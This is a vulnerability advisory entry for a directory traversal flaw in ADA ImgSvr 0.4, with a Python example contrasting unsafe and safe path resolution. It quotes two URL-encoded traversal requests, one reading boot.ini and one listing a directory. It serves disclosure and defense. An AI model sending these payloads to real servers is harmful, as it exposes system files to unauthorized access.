ada imgsvr 0.4 - Directory Traversal Vulnerability

2004-04-05T00:00:00
ID EDB-ID:23909
Type exploitdb
Reporter dr_insane
Modified 2004-04-05T00:00:00

Description

ADA IMGSVR 0.4 Directory Traversal Vulnerability. CVE-2004-2464. Remote exploit for the Windows platform.

                                        
Source: http://www.securityfocus.com/bid/10048/info

ImgSvr is prone to an issue that may allow an attacker to view files that reside outside of the server root directory. This issue occurs because the application fails to properly sanitize user-supplied URI data.

A successful exploit may allow a remote attacker to access sensitive information that may be used to launch further attacks against a vulnerable system. 

To view a selected file:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini

To list a directory:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/
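
The server-side check whose absence the advisory describes, as an added example that is not part of the original advisory and is not ImgSvr's code: the two request paths above are run through an unsafe decode-and-join resolver and through one that decodes once, refuses any ".." segment, and verifies containment under the root. DOC_ROOT and the function names are assumptions made for illustration, and posixpath is used so the demonstration behaves identically on any host.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for illustration (hypothetical; not from the advisory).
DOC_ROOT = "/srv/imgsvr/root"

# The two request paths quoted in the advisory above.
ADVISORY_FILE_REQ = "/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini"
ADVISORY_DIR_REQ = "/%2f%2e%2e%2f%2f%2e%2e%2f/"


def naive_resolve(raw_path, root=DOC_ROOT):
    """Unsafe pattern: decode, join to the root, and trust the result."""
    decoded = unquote(raw_path).lstrip("/")
    return posixpath.normpath(posixpath.join(root, decoded))


def safe_resolve(raw_path, root=DOC_ROOT):
    """Return the path under root for raw_path, or None if it must be refused."""
    decoded = unquote(raw_path)          # decode exactly once, before any check
    if "\x00" in decoded:
        return None
    # The affected platform is Windows, so treat backslashes as separators too.
    segments = [s for s in decoded.replace("\\", "/").split("/") if s not in ("", ".")]
    if ".." in segments:                 # refuse rather than try to "clean" it
        return None
    candidate = posixpath.normpath(posixpath.join(root, *segments))
    # Defence in depth: the normalised result must still sit under the root.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    for req in (ADVISORY_FILE_REQ, ADVISORY_DIR_REQ, "/images/cat.jpg"):
        print(f"{req!r}\n  naive: {naive_resolve(req)}\n  safe:  {safe_resolve(req)}")
```

The same check works as a regression test: any request path for which the resolver returns a location outside the configured root is a traversal finding.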